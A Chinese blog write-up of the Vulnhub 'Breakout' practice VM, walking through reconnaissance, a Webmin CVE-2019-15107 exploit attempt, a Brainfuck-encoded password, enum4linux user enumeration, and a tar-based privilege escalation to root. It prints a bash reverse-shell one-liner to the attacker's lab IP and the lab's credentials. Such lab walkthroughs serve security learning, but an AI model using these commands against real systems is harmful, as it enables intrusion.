【Vulnhub靶场】Breakout

已于 2022-07-05 11:39:45 修改
阅读量697 收藏 3
点赞数 1
分类专栏: 靶场实战 文章标签: 安全 web安全 网络安全
于 2022-06-17 14:08:09 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_53095382/article/details/125332233
版权

目录

前言

一、信息收集

0x00 arp-scan扫描

0x01 nmap扫描

0x02 dirsearch扫描

二、漏洞利用

0x01 webmin 远程代码漏洞

0x02 Brainfuck

0x03 enum4linux

0x04 反弹shell

0x05 搜集信息

三、提权

0x00 tar利用

 总结

前言

Difficulty: Easy

This box was created to be an Easy box, but it can be Medium if you get lost.

 难度:简单
这个盒子被创建为一个简单的盒子,但如果你迷路了,它可以是中等的。

下载链接

https://download.vulnhub.com/empire/02-Breakout.zip.torrent

环境介绍

kali   192.168.56.102

靶机 :192.168.56.101

一、信息收集

0x00 arp-scan扫描

这个是101,因为开关靶机地址刷新了,没有对截图做变更

arp-scan -I eth1 -l

0x01 nmap扫描

 

https://192.168.56.101:10000
https://192.168.56.101:20000
二者页面一致

 正常页面

0x02 dirsearch扫描

 

二、漏洞利用

0x01 webmin 远程代码漏洞

https://github.com/jas502n/CVE-2019-15107
​
python CVE_2019_15107.py https://192.168.56.101:10000/ "ls"

未发现webmin

0x02 Brainfuck

源码内有Brainfuck 密文

解密:http://www.hiencode.com/brain.html

.2uqPEfj3D<P'a-3

0x03 enum4linux

“enum4linux是Kali Linux自带的一款信息收集工具。它可以收集Windows系统的大量信息,如用户名列表、主机列表、共享列表、密码策略信息、工作组和成员信息、主机信息、打印机信息等等
enum4linux -a ip    #做所有简单枚举(-U -S -G -P -r -o -n -i),如果您没有提供任何其他选项,则启用此选项
enum4linux -l ip    #通过LDAP 389 / TCP获取一些(有限的)信息(仅适用于DN)
enum4linux -o ip    #获取操作系统信息
enum4linux -r ip    #通过RID循环枚举用户

用户 cyber
​
密码  .2uqPEfj3D<P'a-3

在10000端口登录失败

在20000端口登录成功

利用终端执行命令

0x04 反弹shell

bash -i >& /dev/tcp/192.168.56.102/9001 0>&1

0x05 搜集信息

在/var/backups目录发现old_pass

三、提权

0x00 tar利用

发现tar可执行

利用tar压缩解压该文件获取权限

权限发生改变

查看old_pass的内容,应该为root的密码

Ts&4&YurgtRX(=~h

提权成功

 总结

1、学习到enum4linux的用法。

2、webmin远程代码漏洞【CVE_2019_15107】利用

Ch33syNai1a0
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
matrix-breakout-2-morpheus靶机渗透笔记
qq_60600840的博客
08-09 403
matrix-breakout-2-morpheus靶机、安全、渗透、靶机
Breakout.zip
05-02
学习openGL制作的打砖块游戏。 学习链接:https://learnopengl-cn.github.io/ 文件内容:并不是项目源码,而是生成的exe文件,及其相关的运行时文件,如dll,纹理,音效,shader,关卡等等。 项目仓库:...
VulnHub靶场----BreakOut
qq_61670993的博客
10-21 1042
小菜鸡一枚
VulnhubBREAKOUT靶机
qq_63283137的博客
10-10 531
smb服务是一个协议名,它能被用于Web连接和客户端与服务器之间的信息沟通,通过 SMB 协议,客户端应用程序可以在各种网络环境下读、写服务器上的文件,以及对服务器程序提出服务请求。可以配置操作系统内部,如用户,磁盘配额,服务或配置文件,以及修改和控制开源应用程序。每当看到二进制文件的副本时,都应该检查一下其 Capabilities(功能)和 suid 程序。根据爆破出来的用户,与解密出的密码尝试登录webmin。再分析扫描出的信息,发现端口服务是smb。发现密码备份文件,但是没有任何的权限。
2024年网络安全最新【网络安全Vulnhub靶场之matrix-breakout-2-morpheus
最新发布
2401_84281720的博客
05-03 701
在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的提升,更是对自己的一份珍贵投资。让我们不断磨砺自己,与时代共同进步,书写属于我们的辉煌篇章。需要完整版PDF学习资源私我。
Vulnhub项目:Breakout
Ays.Ie的博客
04-15 390
本篇记录了vulhub靶机:breakout的整个渗透过程,希望能够帮助到有需要的人
【matrix-breakout-2-morpheus】靶场记录
weixin_46411728的博客
02-14 1159
【matrix-breakout-2-morpheus】靶场记录
breakout_breakout_powerbuilder_
09-30
《PB中的Breakout游戏开发详解》 在信息技术领域,编程游戏是学习编程和软件开发的绝佳途径。"Breakout",又称打砖块,是一款经典的街机游戏,因其简单而富有挑战性的玩法深受程序员喜爱。在PowerBuilder(简称PB)...
breakout-game_前端小游戏_breakout_
10-02
【标题】"breakout-game_前端小游戏_breakout_" 指的是一款利用原生JavaScript编写的打砖块游戏。在Web开发领域,前端小游戏是一种常见的练习项目,它可以帮助开发者提升JavaScript编程技能,同时也能增强对HTML、...
Breakout
03-05
"Breakout"是一款经典的街机游戏,由Atari在1976年发布,由史蒂夫·乔布斯和斯蒂夫·沃兹尼亚克共同设计。游戏的基本概念是玩家控制一块挡板来反弹一个球,目标是消除屏幕上的一系列砖块。这款游戏对后来的许多游戏...
打靶分享:VulnHub-Breakout
weixin_66249173的博客
02-02 1744
最终在/var/backups目录下发现了一个.old_pass.bak看着像个密码,但是没有查看权限,此时我就想到了可以用tar进行压缩再解压,最终得到了一个密码,猜测是root密码。在 Linux 中,文件能力允许进程执行一些超出普通权限的操作,而无需完全的超级用户权限。SMB 协议通常用于在局域网中实现文件和打印机共享,而 Samba 则是 Linux 和其他类 Unix 系统上的一个实现,发现就是个普通的界面,查看源码(这里要仔细查看,并且翻到底。切换时发现会出现失败的情况,所以反弹shell。
vulnhub靶场】MATRIX-BREAKOUT: 2 MORPHEUS
信安是不可或缺的一部分!
06-05 1285
这是《黑客帝国》系列的第二部,副标题是《沉睡魔咒:1》。它的主题是回到第一部《黑客帝国》。你扮演的角色是Trinity,试图调查尼布甲尼撒号上的一台电脑,Cypher把其他人都锁在了电脑之外,这台电脑拥有解开谜团的钥匙。使用apache漏洞利用:(失败)在目录爆破时已经注定失败。192.168.200.254为net网卡dhcp地址。192.168.200.2为net网卡网关。网段为:192.168.200.0/24。靶机地址:192.168.200.134。192.168.200.1为物理机地址。
vulnhub靶场Matrix-Breakout 2 Morpheus教程
m0_73248913的博客
01-22 4140
蚁剑的文件不是完整的,可能会有隐藏文件,此处简单一点直接在反弹shell双管齐下(一句话魔改一下)(记得要弄url编码)(干掉问号和空格和&)系统是Linux4.x|5.x看看有没有漏洞能利用,直接发现有漏洞能直接用CVE-2022-0847。此处有一个file变量,那么改变file变量可以直接对靶机文件修改,升值能随意创建文件。下载下去直接传上去跑就行(蚁剑直接传上去就可以了)(或者使用shell直接吓到靶机里)去到我进来写的shell看到一个图片看看,直接访问,毕竟没有扫出来。
Vulnhub靶机:MATRIX-BREAKOUT_ 2 MORPHEUS
LainWith的博客
01-10 1497
(此系列共1台)发布日期:2022 年 7 月 11 日难度:中级运行环境:Virtualbox运行失败,VMware运行成功目标:取得 root 权限主机发现端口扫描+漏洞扫描ftp探测分析计划任务日志内核提权。
vulnhub靶场Matrix-Breakout 2 Morpheus渗透
weixin_52529261的博客
06-14 491
vulnhub打靶day1
vuln靶机--BreakOut
bobo_milk的博客
05-17 1058
一、信息收集 常规的主机发现以及端口扫描,扫描自己所在的网段。 nmap 192.168.216.0/24 nmap -A -v -T4 -p 1-65535 192.168.216.149 可以看到服务器开启了80端口,139和445端口是samba服务,实现文件共享,10000和20000端口则是搭建了cms,而且版本也暴露了出来。 二、漏洞发现 首先先来查看80端口,只是一个普通的apache的index文件,apache的版本也比较高,因此并没有发现漏洞 在查看了源
VulnHub靶机渗透实战7-BREAKOUT
随心所欲不逾矩
11-18 336
靶机超级简单。靶机和Kali桥接。
Vulnhub靶机渗透之权限提取,SMB泄露问题-靶场Breakout--学习笔记
ZhangAweio的博客
04-09 727
Vulnhub的这个靶场非常适合新手的朋友,里面包含了 信息收集,密码解密,SMB共享文件泄露备份文件泄露,通过泄露的密码进行Linux提权。
vulnhub Breakout靶机渗透
weixin_67567251的博客
10-13 1081
vulnhub Breakout靶机渗透
vulnhub靶场 breakout
08-29
EMPIRE: BREAKOUT是一个在VulnHub网站上提供的虚拟机靶场。你可以在VulnHub网站上搜索EMPIRE: BREAKOUT,并下载该靶场进行学习和实践。 VulnHub是一个提供各种虚拟机靶场的网站,旨在帮助人们学习和提升网络安全技能。在这个靶场中,你可以接触到加密方式和解密过程,对于第一次接触这种加密方式的人来说,可以使用在线站点来进行解密操作,提高对该加密方式的理解和熟悉度。 EMPIRE: BREAKOUT靶场是一个适合初学者的简单难度的靶场,对于计算机学习者来说,初期的学习往往是最迷茫和难以坚持的,但通过不断的学习和实践,经验和能力会得到提高。这个靶场可以帮助你探索和学习网络安全方面的知识和技能。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* *3* [【VulnHub靶场】——EMPIRE: BREAKOUT](https://blog.csdn.net/qq_63844103/article/details/127028486)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 100%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Ch33syNai1a0

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值